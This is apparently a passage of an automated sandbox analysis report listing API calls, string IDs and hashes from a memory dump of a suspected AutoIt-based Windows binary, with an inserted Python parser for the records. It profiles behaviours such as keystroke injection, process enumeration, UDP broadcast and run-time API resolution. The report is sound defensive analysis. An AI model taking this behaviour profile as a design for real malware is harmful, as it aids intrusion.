                                                    • String ID: %lu
                                                    • API String ID: 2507767853-685833217
                                                    • Opcode ID: 34dc7e1dfb1012275423fdf8504f2d01f85a20f25e9c76110d7e007666d6b4d7
                                                    • Instruction ID: 039331eed11949f1bc70e27bae1cc389e542e3b60105e877827ae8838b622f5a
                                                    • Opcode Fuzzy Hash: 34dc7e1dfb1012275423fdf8504f2d01f85a20f25e9c76110d7e007666d6b4d7
                                                    • Instruction Fuzzy Hash: A121B634A00108AFCB10DF55DD85EEE77B8EF89704B1140AAF909EB251DB35EE45CB21
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 004479E1
                                                    • SendMessageW.USER32(?,00000406,00000000,00640000), ref: 004479F6
                                                    • SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 00447A03
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.255796281.00000000003C1000.00000020.00020000.sdmp, Offset: 003C0000, based on PE: true
                                                    • Associated: 00000002.00000002.255788727.00000000003C0000.00000002.00020000.sdmp
                                                    • Associated: 00000002.00000002.255930635.000000000044F000.00000002.00020000.sdmp
                                                    • Associated: 00000002.00000002.255961401.0000000000475000.00000002.00020000.sdmp
                                                    • Associated: 00000002.00000002.255972297.000000000047F000.00000004.00020000.sdmp
                                                    • Associated: 00000002.00000002.255983987.0000000000488000.00000002.00020000.sdmp
                                                    Similarity
                                                    • API ID: MessageSend
                                                    • String ID: msctls_trackbar32
                                                    • API String ID: 3850602802-1010561917
                                                    • Opcode ID: d8ce0129adf20d6ea32224458a48e65859c624e5bfed3b68a086e9a320245d2b
                                                    • Instruction ID: 3420294f707c5e05e9c3c0c817637d5dc45ffbd99d348530b0b06ae0f154dc95
                                                    • Opcode Fuzzy Hash: d8ce0129adf20d6ea32224458a48e65859c624e5bfed3b68a086e9a320245d2b
                                                    • Instruction Fuzzy Hash: C211C172244248BAFF149E74CC09FEB3B6DEF897A4F12461EF645A6090C7369812DB64
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,?,?,?,003E32EA,00000000,?,003E9EFE,000000FF,0000001E,0047BE28,00000008,003E9E62,00000000,?), ref: 003E32BA
                                                    • GetProcAddress.KERNEL32(?,CorExitProcess), ref: 003E32CC
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.255796281.00000000003C1000.00000020.00020000.sdmp, Offset: 003C0000, based on PE: true
                                                    • Associated: 00000002.00000002.255788727.00000000003C0000.00000002.00020000.sdmp
                                                    • Associated: 00000002.00000002.255930635.000000000044F000.00000002.00020000.sdmp
                                                    • Associated: 00000002.00000002.255961401.0000000000475000.00000002.00020000.sdmp
                                                    • Associated: 00000002.00000002.255972297.000000000047F000.00000004.00020000.sdmp
                                                    • Associated: 00000002.00000002.255983987.0000000000488000.00000002.00020000.sdmp
                                                    Similarity
                                                    • API ID: AddressHandleModuleProc
                                                    • String ID: CorExitProcess$mscoree.dll
                                                    • API String ID: 1646373207-1276376045
                                                    • Opcode ID: e854db723a9a3b95db50a3d8a3fe5546e5f348b54895077d66ae4470ad766992
                                                    • Instruction ID: b16c2c1ba8fbb3cddf1c21eda81c385805d268b70ea72c7b1af731211b259a5e
                                                    • Opcode Fuzzy Hash: e854db723a9a3b95db50a3d8a3fe5546e5f348b54895077d66ae4470ad766992
                                                    • Instruction Fuzzy Hash: 86D01231340108FBEB014B91DD16FB93B6CFB42783B510562F904E0890C7639A089624
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • LoadLibraryA.KERNEL32(kernel32.dll,?,003C4D2E,?,003C4F4F,00000000,004862F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,00000000,00000001), ref: 003C4D6F
                                                    • GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 003C4D81
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.255796281.00000000003C1000.00000020.00020000.sdmp, Offset: 003C0000, based on PE: true
                                                    • Associated: 00000002.00000002.255788727.00000000003C0000.00000002.00020000.sdmp
                                                    • Associated: 00000002.00000002.255930635.000000000044F000.00000002.00020000.sdmp
                                                    • Associated: 00000002.00000002.255961401.0000000000475000.00000002.00020000.sdmp
                                                    • Associated: 00000002.00000002.255972297.000000000047F000.00000004.00020000.sdmp
                                                    • Associated: 00000002.00000002.255983987.0000000000488000.00000002.00020000.sdmp
                                                    Similarity
                                                    • API ID: AddressLibraryLoadProc
                                                    • String ID: Wow64DisableWow64FsRedirection$kernel32.dll
                                                    • API String ID: 2574300362-3689287502
                                                    • Opcode ID: 4e56a429d96fb2d005bea3fcd77e5b218999ae096d8d1ed43c6c8304a635ea20
                                                    • Instruction ID: 366625d22b2ac0f184809da4d8ce2709d0fbcc7f768d28fc81c1c41fd922cb77
                                                    • Opcode Fuzzy Hash: 4e56a429d96fb2d005bea3fcd77e5b218999ae096d8d1ed43c6c8304a635ea20
                                                    • Instruction Fuzzy Hash: 63E0C270500342DED7202F30DC0CB827AD4FF02392B20893EE487C0560D2349880CB64
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • LoadLibraryA.KERNEL32(kernel32.dll,?,003C4CE1,?,003FDD1E,00000000,004862F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,00000000,00000001), ref: 003C4DA2
                                                    • GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 003C4DB4
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.255796281.00000000003C1000.00000020.00020000.sdmp, Offset: 003C0000, based on PE: true
                                                    • Associated: 00000002.00000002.255788727.00000000003C0000.00000002.00020000.sdmp
                                                    • Associated: 00000002.00000002.255930635.000000000044F000.00000002.00020000.sdmp
                                                    • Associated: 00000002.00000002.255961401.0000000000475000.00000002.00020000.sdmp
                                                    • Associated: 00000002.00000002.255972297.000000000047F000.00000004.00020000.sdmp
                                                    • Associated: 00000002.00000002.255983987.0000000000488000.00000002.00020000.sdmp
                                                    Similarity
                                                    • API ID: AddressLibraryLoadProc
                                                    • String ID: Wow64RevertWow64FsRedirection$kernel32.dll
                                                    • API String ID: 2574300362-1355242751
                                                    • Opcode ID: 422c465edaa3e6a5d18bb194b1279fb7688e726f9bfe7e647cbac206b981a922
                                                    • Instruction ID: 5869546c17d6b7778d8666c5d500fa417cc34cc5f5ae0b70e64f79040a53c5ec
                                                    • Opcode Fuzzy Hash: 422c465edaa3e6a5d18bb194b1279fb7688e726f9bfe7e647cbac206b981a922
                                                    • Instruction Fuzzy Hash: B8E0C270500703CED7202F31D90CF867AD4EF06395B10883EE4C6C0450D734D880C714
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • LoadLibraryA.KERNEL32(advapi32.dll,?,004412C1), ref: 00441080
                                                    • GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00441092
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.255796281.00000000003C1000.00000020.00020000.sdmp, Offset: 003C0000, based on PE: true
                                                    • Associated: 00000002.00000002.255788727.00000000003C0000.00000002.00020000.sdmp
                                                    • Associated: 00000002.00000002.255930635.000000000044F000.00000002.00020000.sdmp
                                                    • Associated: 00000002.00000002.255961401.0000000000475000.00000002.00020000.sdmp
                                                    • Associated: 00000002.00000002.255972297.000000000047F000.00000004.00020000.sdmp
                                                    • Associated: 00000002.00000002.255983987.0000000000488000.00000002.00020000.sdmp
                                                    Similarity
                                                    • API ID: AddressLibraryLoadProc
                                                    • String ID: RegDeleteKeyExW$advapi32.dll
                                                    • API String ID: 2574300362-4033151799
                                                    • Opcode ID: f4ba7035be9ae6ac15270cff1a3d58b3795198c1c4ffa192c5510664c06e2db8
                                                    • Instruction ID: ed60331976c6fc02a9cff71c158f5513a0be87b5c88f1e271bb4c89982deecd9
                                                    • Opcode Fuzzy Hash: f4ba7035be9ae6ac15270cff1a3d58b3795198c1c4ffa192c5510664c06e2db8
                                                    • Instruction Fuzzy Hash: A7E0EC74510712DEE7205B35D81DA9776E4EF05361B11CD3AA489C5960D738D4C0C658
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • LoadLibraryA.KERNEL32(kernel32.dll,00000001,00439009,?,0044F910), ref: 00439403
                                                    • GetProcAddress.KERNEL32(00000000,GetModuleHandleExW), ref: 00439415
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.255796281.00000000003C1000.00000020.00020000.sdmp, Offset: 003C0000, based on PE: true
                                                    • Associated: 00000002.00000002.255788727.00000000003C0000.00000002.00020000.sdmp
                                                    • Associated: 00000002.00000002.255930635.000000000044F000.00000002.00020000.sdmp
                                                    • Associated: 00000002.00000002.255961401.0000000000475000.00000002.00020000.sdmp
                                                    • Associated: 00000002.00000002.255972297.000000000047F000.00000004.00020000.sdmp
                                                    • Associated: 00000002.00000002.255983987.0000000000488000.00000002.00020000.sdmp
                                                    Similarity
                                                    • API ID: AddressLibraryLoadProc
                                                    • String ID: GetModuleHandleExW$kernel32.dll
                                                    • API String ID: 2574300362-199464113
                                                    • Opcode ID: 92312ca8346b868430cd36b580f449afe62dceb458b1e4a39be36946c001b6b4
                                                    • Instruction ID: d4bfad593574a15c6661aac73b5f788981490f1011ec471fcd1779854b10bc74
                                                    • Opcode Fuzzy Hash: 92312ca8346b868430cd36b580f449afe62dceb458b1e4a39be36946c001b6b4
                                                    • Instruction Fuzzy Hash: C0E01274508713DFD7205F31DA0964776D5EF16392F20C83AE495D5950D678D884C658
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • LoadLibraryA.KERNEL32(kernel32.dll,00000000,003C4C2E,?,00000000), ref: 003C4CA3
                                                    • GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 003C4CB5
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.255796281.00000000003C1000.00000020.00020000.sdmp, Offset: 003C0000, based on PE: true
                                                    • Associated: 00000002.00000002.255788727.00000000003C0000.00000002.00020000.sdmp
                                                    • Associated: 00000002.00000002.255930635.000000000044F000.00000002.00020000.sdmp
                                                    • Associated: 00000002.00000002.255961401.0000000000475000.00000002.00020000.sdmp
                                                    • Associated: 00000002.00000002.255972297.000000000047F000.00000004.00020000.sdmp
                                                    • Associated: 00000002.00000002.255983987.0000000000488000.00000002.00020000.sdmp
                                                    Similarity
                                                    • API ID: AddressLibraryLoadProc
                                                    • String ID: GetNativeSystemInfo$kernel32.dll
                                                    • API String ID: 2574300362-192647395
                                                    • Opcode ID: 771c8b4ca545a8ce287d9095478b9778ddce227fd06b2dfa291a9a36e2b816da
                                                    • Instruction ID: df9db66906d299aae78a596bf36abf4cfb0d52405850fddd3e43199ea9a4ea89
                                                    • Opcode Fuzzy Hash: 771c8b4ca545a8ce287d9095478b9778ddce227fd06b2dfa291a9a36e2b816da
                                                    • Instruction Fuzzy Hash: A2D01774950723DFE7209F31DA28B0676E5AF06791B22C83E9886D6560EA74EC84CB54
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%
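
A parser for the function-similarity records in this listing, added here as an example and not part of the Joe Sandbox report or its tooling. It turns each record's API lines, its "String ID" / "API String ID" fields and its "Uniqueness Score" into a structured object, extracts the export names a function resolves at run time through LoadLibrary*/GetModuleHandle* followed by GetProcAddress (the behaviour the summary lists as "dynamically determine API calls"), and groups records by ID so two reports can be compared on shared IDs instead of by eye. The sample input is constructed from three records on this page; the regular expressions, field names and the LOADERS set are this example's own assumptions about the report layout.

```python
"""Parse the per-function similarity records of this report into structured data."""
import re
from dataclasses import dataclass, field
from typing import Dict, List, Optional

# "• Name.Module(args), ref: ADDR"; the prefix "Part of subcall function ADDR:" and
# the argument list are both optional (see the GetClassNameW line on the page).
# Layout assumptions are this example's own, derived from the listing above.
API_RE = re.compile(
    r"^•\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+):\s*)?"
    r"(?P<name>\w+)\.(?P<module>\w+)(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)")
FIELD_RE = re.compile(r"^•\s*(?P<key>[A-Za-z ]+?):\s*(?P<value>.*)$")
SCORE_RE = re.compile(r"^Uniqueness Score:\s*(?P<score>-?\d+(?:\.\d+)?)%")
# Calls that obtain a module handle; a GetProcAddress next to one of them is a
# run-time import (the "dynamically determine API calls" behaviour in the summary).
LOADERS = {"LoadLibraryA", "LoadLibraryW", "GetModuleHandleW", "GetModuleHandleExW"}


@dataclass
class ApiCall:
    name: str
    module: str
    args: List[str]
    ref: str
    subcall_of: Optional[str] = None  # set for "Part of subcall function" lines


@dataclass
class FunctionRecord:
    apis: List[ApiCall] = field(default_factory=list)
    fields: Dict[str, str] = field(default_factory=dict)  # API ID, String ID, ...
    uniqueness: Optional[float] = None

    def string_ids(self) -> List[str]:
        """'String ID' split on the report's '$' separator."""
        return [s for s in self.fields.get("String ID", "").split("$") if s]

    def resolved_exports(self) -> List[str]:
        """Second argument of each GetProcAddress when a loader call is present."""
        if not any(a.name in LOADERS for a in self.apis):
            return []
        return [a.args[1] for a in self.apis if a.name == "GetProcAddress" and len(a.args) > 1]


def parse_records(text: str) -> List[FunctionRecord]:
    """One record per function; the 'Uniqueness Score' line closes a record."""
    records, cur = [], FunctionRecord()
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        if m := SCORE_RE.match(line):
            cur.uniqueness = float(m.group("score"))
            records.append(cur)
            cur = FunctionRecord()
        elif m := API_RE.match(line):
            args = [a.strip() for a in (m.group("args") or "").split(",") if a.strip()]
            cur.apis.append(ApiCall(m.group("name"), m.group("module"), args,
                                    m.group("ref").upper(), m.group("sub")))
        elif m := FIELD_RE.match(line):
            cur.fields[m.group("key")] = m.group("value").strip()
    return records


def index_by(records: List[FunctionRecord], key: str) -> Dict[str, List[FunctionRecord]]:
    """Group records by one ID field ('API String ID', 'Opcode ID', ...)."""
    out: Dict[str, List[FunctionRecord]] = {}
    for r in records:
        if r.fields.get(key):
            out.setdefault(r.fields[key], []).append(r)
    return out


def shared_ids(a: List[FunctionRecord], b: List[FunctionRecord], key: str = "API String ID") -> List[str]:
    """IDs present in both listings: the overlap used to relate two samples' functions."""
    return sorted(set(index_by(a, key)) & set(index_by(b, key)))


# Constructed sample in the page's layout: three records copied from the listing above.
SAMPLE = """\
APIs
• LoadLibraryA.KERNEL32(kernel32.dll,?,003C4D2E,?,003C4F4F,00000000,004862F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,00000000,00000001), ref: 003C4D6F
• GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 003C4D81
Similarity
• API ID: AddressLibraryLoadProc
• String ID: Wow64DisableWow64FsRedirection$kernel32.dll
• API String ID: 2574300362-3689287502
Uniqueness Score: -1.00%
APIs
  • Part of subcall function 0041A37C: SendMessageTimeoutW.USER32 ref: 0041A399
• GetFocus.USER32(?,00000001,0044F910,?,00000001), ref: 0041A554
• GetClassNameW.USER32 ref: 0041A59D
Similarity
• String ID: %s%d
• API String ID: 2776554818-1110647743
Uniqueness Score: -1.00%
APIs
• GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,?,?,?,003E32EA), ref: 003E32BA
• GetProcAddress.KERNEL32(?,CorExitProcess), ref: 003E32CC
Similarity
• String ID: CorExitProcess$mscoree.dll
• API String ID: 1646373207-1276376045
Uniqueness Score: -1.00%
"""

if __name__ == "__main__":
    for rec in parse_records(SAMPLE):
        print(rec.fields.get("API String ID"), rec.string_ids(), rec.resolved_exports())
```

Running the block prints each record's API String ID, its split string IDs and the exports it resolves at run time. `shared_ids()` on two parsed listings gives the API String IDs they have in common, a cheap first pass before comparing opcode or instruction fuzzy hashes; note that the CorExitProcess record is ordinary CRT exit code and shows up in any MSVC binary, so a match on it alone says nothing about relatedness.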

                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.255796281.00000000003C1000.00000020.00020000.sdmp, Offset: 003C0000, based on PE: true
                                                    • Associated: 00000002.00000002.255788727.00000000003C0000.00000002.00020000.sdmp
                                                    • Associated: 00000002.00000002.255930635.000000000044F000.00000002.00020000.sdmp
                                                    • Associated: 00000002.00000002.255961401.0000000000475000.00000002.00020000.sdmp
                                                    • Associated: 00000002.00000002.255972297.000000000047F000.00000004.00020000.sdmp
                                                    • Associated: 00000002.00000002.255983987.0000000000488000.00000002.00020000.sdmp
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 5c02e7ff7869fa0eec86cce8a3c50c63891b1592df2c956a61f166b03c4e36d5
                                                    • Instruction ID: dbb605fe0d024a2cd4939ac973002a04d890664dbb81615384b47257665e8336
                                                    • Opcode Fuzzy Hash: 5c02e7ff7869fa0eec86cce8a3c50c63891b1592df2c956a61f166b03c4e36d5
                                                    • Instruction Fuzzy Hash: AAC190B5A14216EFDB14DF94C888DEEBBB5FF48314B10859AE405EB250D734EE81CBA4
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • CoInitialize.OLE32(00000000), ref: 004383D8
                                                    • CoUninitialize.OLE32 ref: 004383E3
                                                      • Part of subcall function 0041DA5D: CoCreateInstance.OLE32(00000018,00452C2C,00000005,00000028,?,?,00000001,?,?,00000000,00000000,00000000,?,00438639,?,00000000), ref: 0041DAC5
                                                    • VariantInit.OLEAUT32(?), ref: 004383EE
                                                    • VariantClear.OLEAUT32(?), ref: 004386BF
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.255796281.00000000003C1000.00000020.00020000.sdmp, Offset: 003C0000, based on PE: true
                                                    • Associated: 00000002.00000002.255788727.00000000003C0000.00000002.00020000.sdmp
                                                    • Associated: 00000002.00000002.255930635.000000000044F000.00000002.00020000.sdmp
                                                    • Associated: 00000002.00000002.255961401.0000000000475000.00000002.00020000.sdmp
                                                    • Associated: 00000002.00000002.255972297.000000000047F000.00000004.00020000.sdmp
                                                    • Associated: 00000002.00000002.255983987.0000000000488000.00000002.00020000.sdmp
                                                    Similarity
                                                    • API ID: Variant$ClearCreateInitInitializeInstanceUninitialize
                                                    • String ID:
                                                    • API String ID: 780911581-0
                                                    • Opcode ID: 5e1e852176aa5069115d4d243c8a43b274f66b94f509429e8dd080a7af710ec8
                                                    • Instruction ID: 44de61e7b6f577275991d94fb9156220cd2f37c22ee69ba04cbebd2e50f5e652
                                                    • Opcode Fuzzy Hash: 5e1e852176aa5069115d4d243c8a43b274f66b94f509429e8dd080a7af710ec8
                                                    • Instruction Fuzzy Hash: D6A136752047019FCB11DF15C885B1AB7E4BF88714F15944EF99A9B3A1CB34ED05CB4A
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.255796281.00000000003C1000.00000020.00020000.sdmp, Offset: 003C0000, based on PE: true
                                                    • Associated: 00000002.00000002.255788727.00000000003C0000.00000002.00020000.sdmp
                                                    • Associated: 00000002.00000002.255930635.000000000044F000.00000002.00020000.sdmp
                                                    • Associated: 00000002.00000002.255961401.0000000000475000.00000002.00020000.sdmp
                                                    • Associated: 00000002.00000002.255972297.000000000047F000.00000004.00020000.sdmp
                                                    • Associated: 00000002.00000002.255983987.0000000000488000.00000002.00020000.sdmp
                                                    Similarity
                                                    • API ID: Variant$AllocClearCopyInitString
                                                    • String ID:
                                                    • API String ID: 2808897238-0
                                                    • Opcode ID: 339f8293f92261e4670814d592732add1e174bb0552eec827ef8354cb24d82fa
                                                    • Instruction ID: 842444cae88d5ffde7028ba60924d8a8a18abf094351b300a12137e4c5f106ca
                                                    • Opcode Fuzzy Hash: 339f8293f92261e4670814d592732add1e174bb0552eec827ef8354cb24d82fa
                                                    • Instruction Fuzzy Hash: 2951E835208301ADD730AF65E885EABB7B8DF09360F20881FF555DA191DB38D8C5DB29
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • CreateToolhelp32Snapshot.KERNEL32 ref: 0043F151
                                                    • Process32FirstW.KERNEL32(00000000,?), ref: 0043F15F
                                                    • Process32NextW.KERNEL32(00000000,?), ref: 0043F21F
                                                    • CloseHandle.KERNEL32(00000000,?,?,?), ref: 0043F22E
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.255796281.00000000003C1000.00000020.00020000.sdmp, Offset: 003C0000, based on PE: true
                                                    • Associated: 00000002.00000002.255788727.00000000003C0000.00000002.00020000.sdmp
                                                    • Associated: 00000002.00000002.255930635.000000000044F000.00000002.00020000.sdmp
                                                    • Associated: 00000002.00000002.255961401.0000000000475000.00000002.00020000.sdmp
                                                    • Associated: 00000002.00000002.255972297.000000000047F000.00000004.00020000.sdmp
                                                    • Associated: 00000002.00000002.255983987.0000000000488000.00000002.00020000.sdmp
                                                    Similarity
                                                    • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                                                    • String ID:
                                                    • API String ID: 420147892-0
                                                    • Opcode ID: 847cfad2fee4e34be3744290f2d7bf0dddb68cce016f8ebc0bc180fe017db7c3
                                                    • Instruction ID: 13b41c40d3e2acb8804a2ec3a3bd00e8635428025b05e966ca430454f2082f26
                                                    • Opcode Fuzzy Hash: 847cfad2fee4e34be3744290f2d7bf0dddb68cce016f8ebc0bc180fe017db7c3
                                                    • Instruction Fuzzy Hash: 9B515B715047019FD311EF20DC85F6BBBE8AF98710F10482EF995DA251EB70AD08CB96
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • GetWindowRect.USER32 ref: 00449AD2
                                                    • ScreenToClient.USER32 ref: 00449B05
                                                    • MoveWindow.USER32(?,?,?,?,000000FF,00000001,?,?,00000002,?,?), ref: 00449B72
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.255796281.00000000003C1000.00000020.00020000.sdmp, Offset: 003C0000, based on PE: true
                                                    • Associated: 00000002.00000002.255788727.00000000003C0000.00000002.00020000.sdmp
                                                    • Associated: 00000002.00000002.255930635.000000000044F000.00000002.00020000.sdmp
                                                    • Associated: 00000002.00000002.255961401.0000000000475000.00000002.00020000.sdmp
                                                    • Associated: 00000002.00000002.255972297.000000000047F000.00000004.00020000.sdmp
                                                    • Associated: 00000002.00000002.255983987.0000000000488000.00000002.00020000.sdmp
                                                    Similarity
                                                    • API ID: Window$ClientMoveRectScreen
                                                    • String ID:
                                                    • API String ID: 3880355969-0
                                                    • Opcode ID: 24d397232f13e076dce1bc171240c1dffcdddbd309444109e310bdb5bad926b8
                                                    • Instruction ID: b520e46fdfafcb421ec628f962b5ac8040538e9eaf8248564d88df7b18bac6dc
                                                    • Opcode Fuzzy Hash: 24d397232f13e076dce1bc171240c1dffcdddbd309444109e310bdb5bad926b8
                                                    • Instruction Fuzzy Hash: 7A513B34A00249AFEF10DF68E880AAF7BB5FB45360F14866AF8159B390D734AD41DB94
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • socket.WSOCK32(00000002,00000002,00000011), ref: 00436CE4 (AF_INET, SOCK_DGRAM, IPPROTO_UDP: a UDP socket)
                                                    • WSAGetLastError.WSOCK32(00000000), ref: 00436CF4
                                                    • #21.WSOCK32(?,0000FFFF,00000020,00000002,00000004), ref: 00436D58 (wsock32.dll ordinal 21 is setsockopt; level 0000FFFF = SOL_SOCKET, option 00000020 = SO_BROADCAST)
                                                    • WSAGetLastError.WSOCK32(00000000), ref: 00436D64
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.255796281.00000000003C1000.00000020.00020000.sdmp, Offset: 003C0000, based on PE: true
                                                    • Associated: 00000002.00000002.255788727.00000000003C0000.00000002.00020000.sdmp
                                                    • Associated: 00000002.00000002.255930635.000000000044F000.00000002.00020000.sdmp
                                                    • Associated: 00000002.00000002.255961401.0000000000475000.00000002.00020000.sdmp
                                                    • Associated: 00000002.00000002.255972297.000000000047F000.00000004.00020000.sdmp
                                                    • Associated: 00000002.00000002.255983987.0000000000488000.00000002.00020000.sdmp
                                                    Similarity
                                                    • API ID: ErrorLast$socket
                                                    • String ID:
                                                    • API String ID: 1881357543-0
                                                    • Opcode ID: c98612b1d4e1d816b4a562cc969272d8f6a9011903cdfe51ee3b1ef203986b5d
                                                    • Instruction ID: 34346b6915a03fef01a04f4003d463f8859342d0314d9b21bf965db55208f5bf
                                                    • Opcode Fuzzy Hash: c98612b1d4e1d816b4a562cc969272d8f6a9011903cdfe51ee3b1ef203986b5d
                                                    • Instruction Fuzzy Hash: 4141A074740200AFEB21AF24DC8AF7A77A99B08B10F45801EFA59DF2D2DB749D008B95
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 00448B4D
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.255796281.00000000003C1000.00000020.00020000.sdmp, Offset: 003C0000, based on PE: true
                                                    • Associated: 00000002.00000002.255788727.00000000003C0000.00000002.00020000.sdmp
                                                    • Associated: 00000002.00000002.255930635.000000000044F000.00000002.00020000.sdmp
                                                    • Associated: 00000002.00000002.255961401.0000000000475000.00000002.00020000.sdmp
                                                    • Associated: 00000002.00000002.255972297.000000000047F000.00000004.00020000.sdmp
                                                    • Associated: 00000002.00000002.255983987.0000000000488000.00000002.00020000.sdmp
                                                    Similarity
                                                    • API ID: InvalidateRect
                                                    • String ID:
                                                    • API String ID: 634782764-0
                                                    • Opcode ID: c525c0c2150ac1a2d4f6a179cf9c31bbd4dee38e91e6cfe4a2dbf6aeae760ad6
                                                    • Instruction ID: 90ef501b6af2e95a282f57efee7b8fc9102bd6d9bc972ddb382a45249585bded
                                                    • Opcode Fuzzy Hash: c525c0c2150ac1a2d4f6a179cf9c31bbd4dee38e91e6cfe4a2dbf6aeae760ad6
                                                    • Instruction Fuzzy Hash: AE31D474640248BEFF219B18CC45FAE37A4EB06364F24491FF651E63A1CE39B9408B59
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • GetKeyboardState.USER32(?,00000000,?,00000001), ref: 00421037
                                                    • SetKeyboardState.USER32(00000080), ref: 00421053
                                                    • PostMessageW.USER32(00000000,00000102,?,00000001), ref: 004210B9 (message 00000102 = WM_CHAR: a synthesized keystroke)
                                                    • SendInput.USER32(00000001,00000000,0000001C,00000000,?,00000001), ref: 0042110B
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.255796281.00000000003C1000.00000020.00020000.sdmp, Offset: 003C0000, based on PE: true
                                                    • Associated: 00000002.00000002.255788727.00000000003C0000.00000002.00020000.sdmp
                                                    • Associated: 00000002.00000002.255930635.000000000044F000.00000002.00020000.sdmp
                                                    • Associated: 00000002.00000002.255961401.0000000000475000.00000002.00020000.sdmp
                                                    • Associated: 00000002.00000002.255972297.000000000047F000.00000004.00020000.sdmp
                                                    • Associated: 00000002.00000002.255983987.0000000000488000.00000002.00020000.sdmp
                                                    Similarity
                                                    • API ID: KeyboardState$InputMessagePostSend
                                                    • String ID:
                                                    • API String ID: 432972143-0
                                                    • Opcode ID: cbf8b62a7deb611ac55512567d52843e70c3204511e1dc4c3e319cd9b5d8e2f3
                                                    • Instruction ID: 660dc704686c7786fa320c38a88f1207491eb2d1deb6ddc2bebc29e586fea62f
                                                    • Opcode Fuzzy Hash: cbf8b62a7deb611ac55512567d52843e70c3204511e1dc4c3e319cd9b5d8e2f3
                                                    • Instruction Fuzzy Hash: 7D312C30B406A8ADFB308B66AC05BFB7BA9EB65311F94422BF180519F1C37D49C58769
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 0042BB09
                                                    • GetLastError.KERNEL32(?,00000000), ref: 0042BB2F
                                                    • DeleteFileW.KERNEL32(00000002,?,00000000), ref: 0042BB54
                                                    • CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 0042BB80
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.255796281.00000000003C1000.00000020.00020000.sdmp, Offset: 003C0000, based on PE: true
                                                    • Associated: 00000002.00000002.255788727.00000000003C0000.00000002.00020000.sdmp
                                                    • Associated: 00000002.00000002.255930635.000000000044F000.00000002.00020000.sdmp
                                                    • Associated: 00000002.00000002.255961401.0000000000475000.00000002.00020000.sdmp
                                                    • Associated: 00000002.00000002.255972297.000000000047F000.00000004.00020000.sdmp
                                                    • Associated: 00000002.00000002.255983987.0000000000488000.00000002.00020000.sdmp
                                                    Similarity
                                                    • API ID: CreateHardLink$DeleteErrorFileLast
                                                    • String ID:
                                                    • API String ID: 3321077145-0
                                                    • Opcode ID: 92a3130f401b4a43584a7cbdd31fc64663fec1f4b9a254400739c410eda101b1
                                                    • Instruction ID: 6c2f9b2ec637674275be6eab52fb40e958de14d1e50a36e06ec3ff3edee3a852
                                                    • Opcode Fuzzy Hash: 92a3130f401b4a43584a7cbdd31fc64663fec1f4b9a254400739c410eda101b1
                                                    • Instruction Fuzzy Hash: B1411839200A10DFCB11EF15D589A59BBE5EF49710B0A849AE84A9F762CB34FD01CB95
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.255796281.00000000003C1000.00000020.00020000.sdmp, Offset: 003C0000, based on PE: true
                                                    • Associated: 00000002.00000002.255788727.00000000003C0000.00000002.00020000.sdmp
                                                    • Associated: 00000002.00000002.255930635.000000000044F000.00000002.00020000.sdmp
